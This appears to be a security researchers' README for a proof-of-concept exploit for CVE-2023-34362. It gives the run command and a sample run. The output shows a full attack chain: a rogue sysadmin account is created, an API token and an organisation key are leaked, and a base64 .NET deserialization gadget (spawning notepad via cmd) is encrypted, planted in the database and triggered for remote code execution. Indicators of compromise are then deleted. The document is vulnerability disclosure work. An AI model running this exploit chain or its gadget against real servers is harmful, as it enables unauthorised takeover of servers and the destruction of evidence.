For a full technical description of the vulnerability and exploitation, please read our AttackerKB Analysis.
ruby CVE-2023-34362.rb <TARGET_IP>
Note: The deserialization gadget is configured to spawn 'notepad.exe'.
>ruby poc-cve-2023-34362.rb 192.168.86.111
[+] Starting. target='https://192.168.86.111'.
[+] Retrieved initial session token '3el524tvmjs4iceurhm1r2cq' and InstID '8937'.
[+] Creating new sysadmin account: username='WZHTXMOU', userlogin='NMMLJIIP', password='LUOZFAIB'.
[+] Got API access token='3k2Bs4DBE-5YhK4kBr9HoALoGm4UIsOEg-KYMC6kcB3hwtncbiW-FCrvyXu9JuLgaXBzBg9SeX-GaykQHXWE1R4FBK9G-koUKmGB4u34LNzio3mzMDPA3deCNjGVHOkeIPbHdkcH7BouMlUtFcI0PwRt2frY0z6jBxlpXwVr4GqprxTT8lBnqTRsTpq75Mw0g5WudKvqsIa7z7HH0kq7okp7OVH8M5ABWXiFQ0l2vS9ZlXMwuV9o-1LKt1_nFJjLMtUHGn6mNzMinge774X1gOXGws2Qpjl32PlmRShx2GX0yGb8NYsin_JpJeTI-6BFzS6tJbq_UFtKaoND9WH4oZS5sLW2SHlRPNsJIfBrsi6fYKRLewKThQ'.
[+] Found folderId '963580724'.
[+] Initiated resumable file upload for fileId '966492920'...
[+] Leaked the Org Key: 0B 52 CA 0B FA 01 6F 19 5E D3 61 B1 B9 2A DA 75
[+] Using deserialization gadget: AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAugU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIG5vdGVwYWQuZXhlIiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIgTG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgs=
[+] Encrypted the gadget with Org Key: @%!4QC8WSDbXNJCT0VL6JC/hk5ZHcURgjLQ0B9GNpbAX4Idws3/I9UGjGj1knj44Axu4aEWV1f5UmWeDW5qFMzifaYsXm9JDaou97xYBJ2ZwoLTuh0W4b2GsiF+cvWK6e+vT55A9P53hneQI6Vmg/wqsHbnWLSXV7vu1ehESM27VoDsxdQN6poksUNqTd8bz5iiF1CnkmixHDL7cS8pd2G0BrA6regyKiPFPqVWjvGdBW9aX3pqHxZim7zw8rgOwz1ysjhrqynUY+4fzwQak3NdUsKIVIwagLnD+tAUpYVnL//sJK8JBsnd47Syyj1euF3CYe828p7BumamHiXgMrMA68NC5zq+33tG7a/oXrK5hLft1WPu+9HpxhdNnOTel0N6/RIxcmOfV0bylH7oo8OBLZw6LIQcVgiInv+8xNZ3vPrWK/XYZibNYD2pBNwa38MjS2y9VqqIdi5/zZHo9PuLHayqpM0plqGivMjDq6RXE8gkc/rJ6VNqB2djRCLn8FyOSqR3Btqz/1VnWPDVuooYLnNAfUw7pOnAyu+PABKCExsFbt70YmhIe0loY2clQ6X7LBQtvcEipccKHhwRCxK71yC3gWi7h2OfCh/5VqfOi/cKJ/vs8mEbi1IimeXvAdTXXS3yfzyOURS3nOrHsutF0dhfIfpw0gDVSkdgMVFVRIgxAW160ptBvram/qWIrboe6HawtftSp3Dm7MjaQgT+g/XmVIAAbFYb0jyOOYj/oneOGmSimm4Oupyv2+xiTDf2pHGF1DgF06zT87wmWWvv7TJ3ENNe4sqGmZ6jQB6loZf+/+BEzhYUZgELCHL0UyAu3o6H3a6DtYZ/kkmH+LpYzd9WaplYUyfKQmqChdSO+zqe83uw6rPRql+C+wJOKcGVNAvUMaxCqn3n4rQf73Dg8PicPZHRa/hAD6QOUo7RXbuBPI721NcnhWNg4j/zlW4t7Zosq0j1QQdqP4DleIpeeO/mvXLd1EeqfM8dMI8FxNk2scRGX6Q6WbjVkLfXFRCx7BDpkIR4pB+0Qbtd1Y8BFUxrjKbRfN0rovIz++yBN2STILcLWr8twT21uMwDPuqzPBCY/a1hsl1hE0T2mbtP2ghGcLu2TzaV/XebpH6mndAHJVKey5FcDvZnInp/l2xCdofxxgsYK9i0KqzOS7liQdYz5qyau8dnSHxFiAWRJRI4IkkW6QNtmsTSTlth88aK4nKBXc5DUqUL71N4j6RMVRwZqUJKJy55h3gc84We96H16v6/GYV5QSPm3/DqDA0KKKkqej1Mh0FWfpxjjKwPy+oeEErIHBeUQMIgjdm06XPuzfejT66UvZsgX4YO3BiGcNUYD3WdeIFwEKnpHU/Xw/9j3oPcTyGWWeal2vvQDJ2j9xa4OLFa3waJjb6Zd56l07CUNhN0CiGBTfPagyj/c+NKPiSUWNJDN5bea3duiK670cMQTdMLWDeBUN4qUXPtBKr4wyrcNNhbxIqASx1MCWqIOxQ8MSIedvgrO4w84cl2ntXCSMIyGXREgJ/iWgCIlBjCke3PLY7EKXqihmV8ESLrY78iTniC1/gVL6rQDu+haUuIZxogRs/8PKjo8cI4VMTXE0EaNFCAjc9K2d6hc6ZnBMv9vKF9TwKcm/w92O7TBAjqp3kjQ3JezWk=
[+] Planting encrypted gadget into the DB...
[+] Triggering gadget deserialization...
[+] Gadget deserialized, RCE Achieved!
[+] Deleating IoC's from the DB...
[+] Finished.
rbowes-r7 & cfielding-r7 (SQLi), sfewer-r7 (RCE)